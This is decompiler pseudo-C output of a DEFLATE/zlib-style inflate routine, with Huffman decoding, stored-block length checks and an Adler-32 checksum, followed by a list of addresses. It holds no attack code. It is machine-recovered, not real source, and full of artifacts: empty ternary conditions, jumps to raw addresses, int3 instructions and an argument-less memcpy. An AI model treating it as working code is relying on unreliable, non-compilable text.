																													if(_t846 >=  *(_t1066 - 0x20)) {
																														break;
																													}
																													L209:
																													_t595 = ( *_t846 & 0x000000ff) << _t1050;
																													_t846 = _t846 + 1;
																													_t908 =  *(_t1066 - 0x38);
																													_t1013 = _t1013 | _t595;
																													_t1050 = _t1050 + 8;
																													 *(_t1066 - 0x18) = _t846;
																													 *(_t1066 - 4) = _t1013;
																													__eflags = _t1050 - _t908;
																													if(_t1050 < _t908) {
																														continue;
																													} else {
																														L210:
																														_t595 =  *(_t1066 - 0x28);
																														goto L211;
																													}
																													goto L295;
																												}
																												L251:
																												 *_t1029 = 0x12;
																												goto L285;
																											}
																										} else {
																											L205:
																											_t766 =  *(_t1066 - 8);
																											__eflags = _t766;
																											if(_t766 == 0) {
																												L268:
																												_t684 = _t766 | 0xffffffff;
																												 *_t1029 = 0x11;
																												goto L291;
																											} else {
																												L206:
																												_t595 =  *(_t1066 - 0x28);
																												goto L207;
																											}
																										}
																									} else {
																										L203:
																										_t913 =  *(_t1066 - 8);
																										 *(_t1029 + 0x2924 + _t913) = _t595;
																										_t907 = _t913 + 1;
																										continue;
																									}
																								} else {
																									L181:
																									__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																									if( *(_t1066 - 0x20) - _t846 >= 2) {
																										L195:
																										_t1017 =  *(_t846 + 1) & 0x000000ff;
																										_t769 =  *_t846 & 0x000000ff;
																										_t846 = _t846 + 2;
																										_t907 = _t1065;
																										 *(_t1066 - 0x18) = _t846;
																										 *(_t1066 - 4) =  *(_t1066 - 4) | _t1017 << _t1065 + 0x00000008 | _t769 << _t907;
																										_t1065 = _t1065 + 0x10;
																										__eflags = _t1065;
																										_t1013 =  *(_t1066 - 4);
																										goto L196;
																									} else {
																										do {
																											L182:
																											_t595 = _t1013 & 0x000003ff;
																											_t1040 =  *((short*)(_t1029 + 0x1ca0 + _t595 * 2));
																											__eflags = _t1040;
																											if(_t1040 < 0) {
																												L186:
																												__eflags = _t1065 - 0xa;
																												if(_t1065 <= 0xa) {
																													goto L191;
																												} else {
																													L187:
																													L188:
																													 *(_t1066 - 0x24) = _t907;
																													while(1) {
																														L189:
																														_t1040 =  *((short*)( *(_t1066 - 0x14) + 0x24a0 + ((_t1013 >> _t907 & 0x00000001) +  !_t1040) * 2));
																														_t907 =  *(_t1066 - 0x24) + 1;
																														 *(_t1066 - 0x24) = _t907;
																														__eflags = _t1040;
																														if(_t1040 >= 0) {
																															goto L196;
																														}
																														L190:
																														_t595 = _t907 + 1;
																														__eflags = _t1065 - _t595;
																														if(_t1065 >= _t595) {
																															continue;
																														} else {
																															goto L191;
																														}
																														goto L295;
																													}
																													goto L196;
																												}
																											} else {
																												L183:
																												_t1042 = _t1040 >> 9;
																												__eflags = _t1042;
																												if(_t1042 == 0) {
																													L191:
																													_t1029 =  *(_t1066 - 0x14);
																													L192:
																													__eflags = _t846 -  *(_t1066 - 0x20);
																													if(_t846 >=  *(_t1066 - 0x20)) {
																														L250:
																														 *_t1029 = 0x10;
																														goto L285;
																													} else {
																														goto L193;
																													}
																												} else {
																													L184:
																													__eflags = _t1065 - _t1042;
																													if(_t1065 >= _t1042) {
																														L196:
																														_t1029 =  *(_t1066 - 0x14);
																														goto L197;
																													} else {
																														L185:
																														goto L191;
																													}
																												}
																											}
																											goto L295;
																											L193:
																											_t907 = _t1065;
																											_t773 = ( *_t846 & 0x000000ff) << _t907;
																											_t846 = _t846 + 1;
																											_t1013 = _t1013 | _t773;
																											 *(_t1066 - 0x18) = _t846;
																											_t1065 = _t1065 + 8;
																											 *(_t1066 - 4) = _t1013;
																											__eflags = _t1065 - 0xf;
																										} while (_t1065 < 0xf);
																										goto L197;
																									}
																								}
																								goto L295;
																							}
																							L215:
																							_t1014 =  *(_t1029 + 0x2c);
																							_t745 =  *(_t1029 + 0x30) + _t1014;
																							__eflags = _t745 - _t907;
																							if(_t745 != _t907) {
																								L269:
																								_t684 = _t745 | 0xffffffff;
																								 *_t1029 = 0x15;
																								goto L291;
																							} else {
																								L216:
																								memcpy(_t1029 + 0x40, _t1029 + 0x2924, _t1014);
																								_t751 =  *(_t1029 + 0x2c) + 0x2924 + _t1029;
																								__eflags = _t751;
																								memcpy(_t1029 + 0xde0, _t751,  *(_t1029 + 0x30));
																								_t1068 = _t1068 + 0x18;
																								goto L217;
																							}
																							goto L295;
																						}
																					}
																				} else {
																					L149:
																					__eflags = _t906 - 1;
																					if(_t906 > 1) {
																						L267:
																						 *(_t1066 - 0xc) = 0xffffffff;
																						 *_t1029 = 0x23;
																						goto L292;
																					} else {
																						goto L150;
																					}
																				}
																				goto L295;
																			}
																			L218:
																			_t988 =  *(_t1066 - 4);
																			while(1) {
																				L38:
																				_t883 =  *(_t1066 - 0x20) - _t846;
																				__eflags = _t883 - 4;
																				if(_t883 < 4) {
																					goto L57;
																				}
																				goto L39;
																			}
																			goto L57;
																		}
																	}
																} else {
																	L89:
																	_t595 = _t1050 & 0x00000007;
																	__eflags = _t1050 - _t595;
																	if(_t1050 >= _t595) {
																		L92:
																		_t940 = _t1050 & 0x00000007;
																		_t987 = _t997 >> _t940;
																		_t1050 = _t1050 - _t940;
																		 *(_t1066 - 4) = _t987;
																		_t941 = 0;
																		__eflags = 0;
																		while(1) {
																			L93:
																			 *(_t1066 - 8) = _t941;
																			__eflags = _t941 - 4;
																			if(_t941 >= 4) {
																				break;
																			}
																			L94:
																			__eflags = _t1050;
																			if(_t1050 == 0) {
																				L100:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					L244:
																					 *_t1029 = 7;
																					goto L285;
																				} else {
																					L101:
																					_t595 =  *_t846;
																					_t846 = _t846 + 1;
																					(_t1029 + 0x2920)[_t941] = _t595;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 0x18) = _t846;
																					continue;
																				}
																			} else {
																				L95:
																				__eflags = _t1050 - 8;
																				if(_t1050 >= 8) {
																					L99:
																					(_t1029 + 0x2920)[_t941] = _t987;
																					_t1050 = _t1050 - 8;
																					_t987 = _t987 >> 8;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 4) = _t987;
																					continue;
																				} else {
																					while(1) {
																						L96:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L97:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t987 = _t987 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t987;
																						__eflags = _t1050 - 8;
																						if(_t1050 < 8) {
																							continue;
																						} else {
																							L98:
																							_t941 =  *(_t1066 - 8);
																							goto L99;
																						}
																						goto L295;
																					}
																					L243:
																					 *_t1029 = 6;
																					goto L285;
																				}
																			}
																			goto L295;
																		}
																		L102:
																		_t595 =  *(_t1029 + 0x2922) & 0x000000ff;
																		 *(_t1066 - 8) = ( *(_t1029 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1029 + 0x2920) & 0x000000ff;
																		__eflags =  *(_t1066 - 8) - ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff);
																		if( *(_t1066 - 8) != ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff)) {
																			L265:
																			 *(_t1066 - 0xc) = 0xffffffff;
																			 *_t1029 = 0x27;
																			goto L292;
																		} else {
																			L103:
																			_t949 =  *(_t1066 - 8);
																			while(1) {
																				L104:
																				__eflags = _t949;
																				if(_t949 == 0) {
																					goto L84;
																				}
																				L105:
																				__eflags = _t1050;
																				if(_t1050 == 0) {
																					L112:
																					_t595 =  *(_t1066 - 0x10);
																					while(1) {
																						L113:
																						__eflags = _t949;
																						if(_t949 == 0) {
																							break;
																						}
																						L115:
																						_t1025 =  *((intOrPtr*)(_t1066 - 0x40));
																						__eflags = _t595 - _t1025;
																						if(_t595 < _t1025) {
																							L117:
																							_t595 =  *(_t1066 - 0x20);
																							__eflags = _t846 - _t595;
																							if(_t846 >= _t595) {
																								L247:
																								_t1029 =  *(_t1066 - 0x14);
																								 *_t1029 = 0x26;
																								goto L285;
																							} else {
																								L118:
																								_t987 = _t1025 -  *(_t1066 - 0x10);
																								_t1047 = _t595 - _t846;
																								__eflags = _t987 - _t1047;
																								_t817 =  <  ? _t987 : _t1047;
																								__eflags = ( <  ? _t987 : _t1047) - _t949;
																								if(( <  ? _t987 : _t1047) >= _t949) {
																									_t1029 = _t949;
																								} else {
																									__eflags = _t987 - _t1047;
																									_t1029 =  <  ? _t987 : _t1047;
																								}
																								L121:
																								L122:
																								memcpy();
																								_t846 = _t846 + _t1029;
																								_t595 =  *(_t1066 - 0x10) + _t1029;
																								_t1068 = _t1068 + 0xc;
																								 *(_t1066 - 0x18) = _t846;
																								_t949 =  *(_t1066 - 8) - _t1029;
																								 *(_t1066 - 0x10) = _t595;
																								 *(_t1066 - 8) = _t949;
																								continue;
																							}
																						} else {
																							L116:
																							_t1029 =  *(_t1066 - 0x14);
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 9;
																							goto L292;
																						}
																						goto L295;
																					}
																					L114:
																					goto 0x301388;
																					asm("int3");
																					goto L84;
																				} else {
																					L106:
																					__eflags = _t1050 - 8;
																					if(_t1050 >= 8) {
																						L109:
																						_t595 = _t987 & 0x000000ff;
																						_t987 = _t987 >> 8;
																						_t1050 = _t1050 - 8;
																						 *(_t1066 - 0x28) = _t595;
																						 *(_t1066 - 4) = _t987;
																						L110:
																						__eflags =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 - 0x40));
																						_t1029 =  *(_t1066 - 0x14);
																						if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
																							L246:
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 0x34;
																							goto L292;
																						} else {
																							L111:
																							 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
																							 *( *(_t1066 - 0x10)) = _t595;
																							_t949 =  *(_t1066 - 8) - 1;
																							 *(_t1066 - 8) = _t949;
																							continue;
																						}
																					} else {
																						while(1) {
																							L107:
																							__eflags = _t846 -  *(_t1066 - 0x20);
																							if(_t846 >=  *(_t1066 - 0x20)) {
																								break;
																							}
																							L108:
																							_t595 = ( *_t846 & 0x000000ff) << _t1050;
																							_t846 = _t846 + 1;
																							_t987 = _t987 | _t595;
																							 *(_t1066 - 0x18) = _t846;
																							_t1050 = _t1050 + 8;
																							 *(_t1066 - 4) = _t987;
																							__eflags = _t1050 - 8;
																							if(_t1050 < 8) {
																								continue;
																							} else {
																								goto L109;
																							}
																							goto L295;
																						}
																						L245:
																						 *_t1029 = 0x33;
																						goto L285;
																					}
																				}
																				goto L295;
																			}
																			continue;
																		}
																	} else {
																		while(1) {
																			L90:
																			__eflags = _t846 -  *(_t1066 - 0x20);
																			if(_t846 >=  *(_t1066 - 0x20)) {
																				break;
																			}
																			L91:
																			_t823 = ( *_t846 & 0x000000ff) << _t1050;
																			_t1050 = _t1050 + 8;
																			_t997 = _t997 | _t823;
																			_t846 = _t846 + 1;
																			 *(_t1066 - 0x18) = _t846;
																			_t595 = _t1050 & 0x00000007;
																			 *(_t1066 - 4) = _t997;
																			__eflags = _t1050 - _t595;
																			if(_t1050 < _t595) {
																				continue;
																			} else {
																				goto L92;
																			}
																			goto L295;
																		}
																		L242:
																		 *_t1029 = 5;
																		goto L285;
																	}
																}
															} else {
																while(1) {
																	L86:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L87:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t987 = _t987 | _t595;
																	 *(_t1066 - 0x18) = _t846;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - 3;
																	if(_t1050 < 3) {
																		continue;
																	} else {
																		goto L88;
																	}
																	goto L295;
																}
																L241:
																 *_t1029 = 3;
																goto L285;
															}
															goto L295;
														}
														L252:
														_t595 = _t1064 & 0x00000007;
														__eflags = _t1064 - _t595;
														if(_t1064 >= _t595) {
															L256:
															_t683 =  *(_t1066 - 0x3c);
															_t890 = _t1064 & 0x00000007;
															_t992 = _t987 >> _t890;
															_t1050 = _t1064 - _t890;
															 *(_t1066 - 4) = _t992;
															__eflags = _t846 - _t683;
															if(_t846 > _t683) {
																while(1) {
																	L257:
																	__eflags = _t1050 - 8;
																	if(_t1050 < 8) {
																		goto L259;
																	}
																	L258:
																	_t846 = _t846 - 1;
																	_t1050 = _t1050 - 8;
																	__eflags = _t846 - _t683;
																	if(_t846 > _t683) {
																		continue;
																	}
																	goto L259;
																}
															}
															L259:
															L260:
															_t595 = _t1050;
															asm("bts edx, eax");
															__eflags = _t595 - 0x20;
															_t892 =  >=  ? _t992 : 0;
															_t993 = _t992 ^ _t892;
															__eflags = _t595 - 0x40;
															_t893 =  >=  ? _t993 : _t892;
															 *(_t1066 - 4) =  *(_t1066 - 4) & _t993 - 0x00000001;
															__eflags =  *(_t1066 + 0x18) & 0x00000001;
															if(( *(_t1066 + 0x18) & 0x00000001) == 0) {
																L290:
																_t684 = 0;
																__eflags = 0;
																 *_t1029 = 0x22;
																goto L291;
															} else {
																L261:
																_t894 = 0;
																while(1) {
																	L277:
																	 *(_t1066 - 8) = _t894;
																	__eflags = _t894 - 4;
																	if(_t894 >= 4) {
																		goto L290;
																	}
																	L278:
																	__eflags = _t1050;
																	if(_t1050 != 0) {
																		L281:
																		_t995 =  *(_t1066 - 4);
																		__eflags = _t1050 - 8;
																		if(_t1050 >= 8) {
																			L275:
																			_t685 = _t995 & 0x000000ff;
																			_t1050 = _t1050 - 8;
																			__eflags = _t1050;
																			 *(_t1066 - 4) = _t995 >> 8;
																			goto L276;
																		} else {
																			L282:
																			while(1) {
																				L272:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					break;
																				}
																				L273:
																				_t595 = ( *_t846 & 0x000000ff) << _t1050;
																				_t1050 = _t1050 + 8;
																				_t995 = _t995 | _t595;
																				_t846 = _t846 + 1;
																				 *(_t1066 - 4) = _t995;
																				__eflags = _t1050 - 8;
																				if(_t1050 < 8) {
																					continue;
																				} else {
																					L274:
																					_t894 =  *(_t1066 - 8);
																					goto L275;
																				}
																				goto L295;
																			}
																			L284:
																			 *_t1029 = 0x29;
																			goto L285;
																		}
																	} else {
																		L279:
																		__eflags = _t846 -  *(_t1066 - 0x20);
																		if(_t846 >=  *(_t1066 - 0x20)) {
																			L283:
																			 *_t1029 = 0x2a;
																			goto L285;
																		} else {
																			L280:
																			_t685 =  *_t846 & 0x000000ff;
																			_t846 = _t846 + 1;
																			L276:
																			 *(_t1066 - 0x24) = _t685;
																			_t595 =  *(_t1029 + 0x10) << 0x00000008 |  *(_t1066 - 0x24);
																			_t894 = _t894 + 1;
																			__eflags = _t894;
																			 *(_t1029 + 0x10) = _t595;
																			continue;
																		}
																	}
																	goto L295;
																}
																goto L290;
															}
														} else {
															L253:
															while(1) {
																L254:
																__eflags = _t846 -  *(_t1066 - 0x20);
																if(_t846 >=  *(_t1066 - 0x20)) {
																	break;
																}
																L255:
																_t1050 = _t1064 + 8;
																_t987 = _t987 | ( *_t846 & 0x000000ff) << _t1064;
																_t846 = _t846 + 1;
																 *(_t1066 - 4) = _t987;
																_t595 = _t1050 & 0x00000007;
																__eflags = _t1050 - _t595;
																if(_t1050 < _t595) {
																	continue;
																} else {
																	goto L256;
																}
																goto L295;
															}
															L271:
															 *_t1029 = 0x20;
															goto L285;
														}
													}
												} else {
													L48:
													__eflags = _t1064 - 0xf;
													if(_t1064 < 0xf) {
														_t1006 =  *(_t846 + 1) & 0x000000ff;
														_t884 = _t1064;
														_t723 =  *_t846 & 0x000000ff;
														_t846 = _t846 + 2;
														_t1029 =  *(_t1066 - 0x14);
														 *(_t1066 - 0x18) = _t846;
														 *(_t1066 - 4) =  *(_t1066 - 4) | (_t1006 << 0x00000008 | _t723) << _t884;
														_t1064 = _t1064 + 0x10;
														__eflags = _t1064;
														_t987 =  *(_t1066 - 4);
													}
													_t716 =  *((short*)(_t1029 + 0x160 + (_t987 & 0x000003ff) * 2));
													 *(_t1066 - 0x1c) = _t716;
													__eflags = _t716;
													if(_t716 < 0) {
														L52:
														goto 0x301349;
														asm("int3");
														asm("int3");
														asm("int3");
														do {
															L53:
															_t718 = _t987 >> _t884;
															_t884 = _t884 + 1;
															_t846 =  *((short*)(_t1029 + 0x960 + ((_t718 & 0x00000001) +  !_t846) * 2));
															__eflags = _t846;
														} while (_t846 < 0);
														 *(_t1066 - 0x1c) = _t846;
														_t846 =  *(_t1066 - 0x18);
													} else {
														L51:
														_t884 = _t716 >> 9;
													}
													L55:
													_t595 =  *(_t1066 - 8);
													_t1064 = _t1064 - _t884;
													_t987 = _t987 >> _t884;
													 *(_t1066 - 4) = _t987;
													 *( *(_t1066 - 0x10)) = _t595;
													_t884 =  *(_t1066 - 0x1c);
													__eflags = _t884 & 0x00000100;
													if((_t884 & 0x00000100) != 0) {
														L82:
														_t168 = _t1066 - 0x10;
														 *_t168 =  *(_t1066 - 0x10) + 1;
														__eflags =  *_t168;
														goto L83;
													} else {
														L56:
														_t721 =  *(_t1066 - 0x10);
														 *(_t721 + 1) = _t884;
														 *(_t1066 - 0x10) = _t721 + 2;
														while(1) {
															L38:
															_t883 =  *(_t1066 - 0x20) - _t846;
															__eflags = _t883 - 4;
															if(_t883 < 4) {
																goto L57;
															}
															goto L39;
														}
													}
												}
											}
											goto L295;
											L57:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L74:
												_t669 =  *((short*)(_t1029 + 0x160 + (_t988 & 0x000003ff) * 2));
												 *(_t1066 - 8) = _t669;
												__eflags = _t669;
												if(_t669 < 0) {
													L76:
													goto 0x301372;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L77:
														_t671 = _t988 >> _t883;
														_t883 = _t883 + 1;
														_t595 = (_t671 & 0x00000001) +  !_t846;
														_t846 =  *((short*)(_t1029 + 0x960 + _t595 * 2));
														__eflags = _t846;
													} while (_t846 < 0);
													 *(_t1066 - 8) = _t846;
													_t846 =  *(_t1066 - 0x18);
												} else {
													L75:
													_t883 = _t669 >> 9;
													_t595 = _t669 & 0x000001ff;
													 *(_t1066 - 8) = _t595;
												}
												L79:
												_t987 = _t988 >> _t883;
												_t1064 = _t1050 - _t883;
												_t884 =  *(_t1066 - 8);
												 *(_t1066 - 4) = _t987;
												__eflags = _t884 - 0x100;
												if(_t884 >= 0x100) {
													goto L83;
												} else {
													L80:
													_t825 =  *(_t1066 - 0x10);
													__eflags = _t825 -  *((intOrPtr*)(_t1066 - 0x40));
													if(_t825 >=  *((intOrPtr*)(_t1066 - 0x40))) {
														L240:
														 *(_t1066 - 0xc) = 2;
														 *_t1029 = 0x18;
														goto L292;
													} else {
														L81:
														 *_t825 = _t884;
														 *(_t1066 - 0x10) = _t825 + 1;
														continue;
													}
												}
											} else {
												L58:
												__eflags = _t883 - 2;
												if(_t883 >= 2) {
													L72:
													_t999 =  *(_t846 + 1) & 0x000000ff;
													_t697 =  *_t846 & 0x000000ff;
													_t846 = _t846 + 2;
													_t883 = _t1050;
													 *(_t1066 - 0x18) = _t846;
													 *(_t1066 - 4) =  *(_t1066 - 4) | _t999 << _t1050 + 0x00000008 | _t697 << _t883;
													_t1050 = _t1050 + 0x10;
													__eflags = _t1050;
													_t988 =  *(_t1066 - 4);
													goto L73;
												} else {
													do {
														L59:
														_t595 = _t988 & 0x000003ff;
														_t1032 =  *((short*)(_t1029 + 0x160 + _t595 * 2));
														__eflags = _t1032;
														if(_t1032 < 0) {
															L63:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L68;
															} else {
																L64:
																 *(_t1066 - 0x1c) = _t883;
																while(1) {
																	L66:
																	_t1032 =  *((short*)( *(_t1066 - 0x14) + 0x960 + ((_t988 >> _t883 & 0x00000001) +  !_t1032) * 2));
																	_t883 =  *(_t1066 - 0x1c) + 1;
																	 *(_t1066 - 0x1c) = _t883;
																	__eflags = _t1032;
																	if(_t1032 >= 0) {
																		goto L73;
																	}
																	L67:
																	_t595 = _t883 + 1;
																	__eflags = _t1050 - _t595;
																	if(_t1050 >= _t595) {
																		continue;
																	} else {
																		goto L68;
																	}
																	goto L295;
																}
																goto L73;
															}
														} else {
															L60:
															_t1034 = _t1032 >> 9;
															__eflags = _t1034;
															if(_t1034 == 0) {
																L68:
																_t1029 =  *(_t1066 - 0x14);
																L69:
																__eflags = _t846 -  *(_t1066 - 0x20);
																if(_t846 >=  *(_t1066 - 0x20)) {
																	L239:
																	 *_t1029 = 0x17;
																	goto L285;
																} else {
																	goto L70;
																}
															} else {
																L61:
																__eflags = _t1050 - _t1034;
																if(_t1050 >= _t1034) {
																	L73:
																	_t1029 =  *(_t1066 - 0x14);
																	goto L74;
																} else {
																	L62:
																	goto L68;
																}
															}
														}
														goto L295;
														L70:
														_t883 = _t1050;
														_t701 = ( *_t846 & 0x000000ff) << _t883;
														_t846 = _t846 + 1;
														_t988 = _t988 | _t701;
														 *(_t1066 - 0x18) = _t846;
														_t1050 = _t1050 + 8;
														 *(_t1066 - 4) = _t988;
														__eflags = _t1050 - 0xf;
													} while (_t1050 < 0xf);
													goto L74;
												}
											}
											goto L295;
										}
									}
								} else {
									L270:
									_t684 = _t595 | 0xffffffff;
									 *_t1029 = 0x25;
									L291:
									 *(_t1066 - 0xc) = _t684;
									goto L292;
								}
							} else {
								L9:
								if(_t1050 >= _t875) {
									L12:
									_t1050 = _t1050 - _t875;
									_t842 = (_t595 << _t875) - 0x00000001 & _t988;
									_t988 = _t988 >> _t875;
									 *(_t1066 - 0x28) =  *(_t1066 - 0x28) + _t842;
									_t595 =  *(_t1066 - 0x28);
									 *(_t1066 - 4) = _t988;
									goto L14;
								} else {
									L10:
									while(_t846 <  *(_t1066 - 0x20)) {
										_t595 = ( *_t846 & 0x000000ff) << _t1050;
										_t846 = _t846 + 1;
										_t875 =  *(_t1066 - 0x38);
										_t988 = _t988 | _t595;
										_t1050 = _t1050 + 8;
										 *(_t1066 - 0x18) = _t846;
										 *(_t1066 - 4) = _t988;
										if(_t1050 < _t875) {
											continue;
										} else {
											goto L12;
										}
										goto L295;
									}
									 *_t1029 = 0x1b;
									L285:
									__eflags =  *(_t1066 + 0x18) & 0x00000002;
									L286:
									L287:
									_t596 =  !=  ? 1 : _t595;
									 *(_t1066 - 0xc) = _t596;
									__eflags = _t596 - 1;
									if(_t596 != 1) {
										L288:
										__eflags = _t596 - 0xfffffffc;
										if(_t596 != 0xfffffffc) {
											L289:
											L292:
											_t641 =  *(_t1066 - 0x3c);
											__eflags = _t846 - _t641;
											if(_t846 > _t641) {
												while(1) {
													L293:
													__eflags = _t1050 - 8;
													if(_t1050 < 8) {
														goto L295;
													}
													L294:
													_t846 = _t846 - 1;
													_t1050 = _t1050 - 8;
													__eflags = _t846 - _t641;
													if(_t846 > _t641) {
														continue;
													}
													goto L295;
												}
											}
										}
									}
								}
							}
							goto L295;
							L4:
							goto 0x3012ba;
							asm("int3");
							asm("int3");
							asm("int3");
							do {
								L6:
								_t657 = _t987 >> _t872;
								_t872 = _t872 + 1;
								_t846 =  *((short*)(_t1029 + 0x1700 + ((_t657 & 0x00000001) +  !_t846) * 2));
								__eflags = _t846;
							} while (_t846 < 0);
							 *(_t1066 - 0x1c) = _t846;
							_t846 =  *(_t1066 - 0x18);
							_t660 =  *(_t1066 - 0x1c);
							goto L8;
						}
					}
					L295:
					_t968 =  *(_t1066 - 4);
					L296:
					 *(_t1029 + 4) = _t1050;
					asm("bts ecx, esi");
					__eflags = _t1050 - 0x20;
					_t598 =  >=  ? 0 : 0;
					_t860 = 0 ^ _t598;
					__eflags = _t1050 - 0x40;
					_t599 =  >=  ? _t860 : _t598;
					 *(_t1029 + 0x20) =  *(_t1066 - 0x28);
					_t970 =  *(_t1066 - 0x10) -  *(_t1066 + 0x10);
					__eflags =  *(_t1066 + 0x18) & 0x00000009;
					 *(_t1029 + 0x24) =  *(_t1066 - 8);
					 *(_t1029 + 0x28) =  *(_t1066 - 0x38);
					 *((intOrPtr*)(_t1029 + 0x3c)) =  *((intOrPtr*)(_t1066 - 0x48));
					 *(_t1029 + 0x38) = _t860 - 0x00000001 & _t968;
					 *(_t1066 - 0x10) = _t970;
					 *((intOrPtr*)( *((intOrPtr*)(_t1066 + 8)))) = _t846 -  *(_t1066 - 0x3c);
					_t848 =  *(_t1066 - 0xc);
					 *( *(_t1066 + 0x14)) = _t970;
					if(( *(_t1066 + 0x18) & 0x00000009) != 0) {
						L297:
						__eflags = _t848;
						if(_t848 >= 0) {
							L298:
							_t1052 =  *(_t1029 + 0x1c);
							_t863 = _t1052 & 0x0000ffff;
							_t609 = (0x5e6ea9af * _t970 >> 0x20 >> 0xb) * 0x15b0;
							_t1053 = _t1052 >> 0x10;
							 *(_t1066 - 0x3c) = _t1053;
							_t974 =  *(_t1066 - 0x10) - _t609;
							__eflags =  *(_t1066 - 0x10);
							 *(_t1066 - 0x34) = _t974;
							if( *(_t1066 - 0x10) != 0) {
								L299:
								_t850 = _t974;
								do {
									L300:
									_t975 = 0;
									 *(_t1066 + 0x14) = 0;
									__eflags = _t850 - 7;
									if(_t850 > 7) {
										L301:
										goto 0x30149d;
										asm("int3");
										asm("int3");
										asm("int3");
										L302:
										_t1031 = _t1029 - _t609;
										__eflags = _t1031;
										do {
											L303:
											_t975 =  &(_t975[2]);
											_t865 = _t863 + ( *_t609 & 0x000000ff);
											_t866 = _t865 + ( *( *(_t1066 + 0x10) + 1) & 0x000000ff);
											_t867 = _t866 + ( *( *(_t1066 + 0x10) + 2) & 0x000000ff);
											_t868 = _t867 + ( *( *(_t1066 + 0x10) + 3) & 0x000000ff);
											_t869 = _t868 + ( *( *(_t1066 + 0x10) + 4) & 0x000000ff);
											_t870 = _t869 + ( *( *(_t1066 + 0x10) + 5) & 0x000000ff);
											_t871 = _t870 + ( *( *(_t1066 + 0x10) + 6) & 0x000000ff);
											_t863 = _t871 + ( *( *(_t1066 + 0x10) + 7) & 0x000000ff);
											_t639 =  *(_t1066 + 0x10) + 8;
											_t1053 = _t1053 + _t865 + _t866 + _t867 + _t868 + _t869 + _t870 + _t871 + _t863;
											 *(_t1066 + 0x10) = _t639;
											__eflags = _t639 + _t1031 - _t850;
											_t609 =  *(_t1066 + 0x10);
										} while (_t639 + _t1031 < _t850);
										 *(_t1066 + 0x14) = _t975;
										 *(_t1066 - 0x3c) = _t1053;
									}
									L305:
									_t1029 = 0;
									 *((intOrPtr*)(_t1066 + 8)) = 0;
									__eflags = _t975 - _t850;
									if(_t975 < _t850) {
										L306:
										__eflags = _t850 - _t975 - 2;
										if(_t850 - _t975 >= 2) {
											L307:
											_t619 =  *(_t1066 + 0x14);
											_t1056 =  *(_t1066 + 0x10);
											_t851 = 0;
											_t986 = (_t850 - _t619 - 2 >> 1) + 1;
											__eflags = _t986;
											 *(_t1066 + 0x14) = _t619 + _t986 * 2;
											do {
												L308:
												_t864 = _t863 + ( *_t1056 & 0x000000ff);
												_t622 =  *(_t1056 + 1) & 0x000000ff;
												_t1029 = _t1029 + _t864;
												_t1056 = _t1056 + 2;
												_t863 = _t864 + _t622;
												_t851 = _t851 + _t863;
												_t986 = _t986 - 1;
												__eflags = _t986;
											} while (_t986 != 0);
											_t975 =  *(_t1066 + 0x14);
											 *(_t1066 + 0x10) = _t1056;
											_t1053 =  *(_t1066 - 0x3c);
											 *((intOrPtr*)(_t1066 + 8)) = _t851;
											_t850 =  *(_t1066 - 0x34);
										}
										L310:
										__eflags = _t975 - _t850;
										if(_t975 < _t850) {
											_t980 =  *(_t1066 + 0x10);
											_t863 = _t863 + ( *_t980 & 0x000000ff);
											_t1053 = _t1053 + _t863;
											_t981 =  &(_t980[1]);
											__eflags = _t981;
											 *(_t1066 + 0x10) = _t981;
										}
										L312:
										_t609 =  *((intOrPtr*)(_t1066 + 8)) + _t1029;
										_t1053 = _t1053 + _t609;
										__eflags = _t1053;
									}
									L313:
									L314:
									_t863 = _t863 + (_t609 * _t863 >> 0x20 >> 0xf) * 0xffff000f;
									_t609 = (0x80078071 * _t1053 >> 0x20 >> 0xf) * 0xffff000f;
									_t1053 = _t1053 + _t609;
									_t586 = _t1066 - 0x10;
									 *_t586 =  *(_t1066 - 0x10) - _t850;
									__eflags =  *_t586;
									_t850 = 0x15b0;
									 *(_t1066 - 0x3c) = _t1053;
									 *(_t1066 - 0x34) = 0x15b0;
								} while ( *_t586 != 0);
								goto 0x3014c6;
								asm("int3");
							}
							L316:
							_t1055 = (_t1053 << 0x10) + _t863;
							 *(_t1029 + 0x1c) = _t1055;
							__eflags = _t848;
							if(_t848 == 0) {
								__eflags =  *(_t1066 + 0x18) & 0x00000001;
								if(( *(_t1066 + 0x18) & 0x00000001) != 0) {
									__eflags = _t1055 -  *(_t1029 + 0x10);
									_t848 =  !=  ? 0xfffffffe : _t848;
								}
							}
						}
					}
					L319:
					return _t848;
					L320:
				}
				L264:
				 *__edi = 0x1a;
				goto L285;
			}

0x001153df
0x001153df
0x001153df
0x001153df
0x001153df
0x001153df
0x001153e2
0x00000000
0x00000000
0x001153e8
0x001153eb
0x001153ef
0x001153f0
0x001153f2
0x001153f5
0x001153f8
0x001153fe
0x00116161
0x00116168
0x00116170
0x00116173
0x00116175
0x0011618f
0x0011618f
0x00116192
0x00000000
0x00116198
0x00116198
0x0011619d
0x0011619d
0x001161a0
0x001161a0
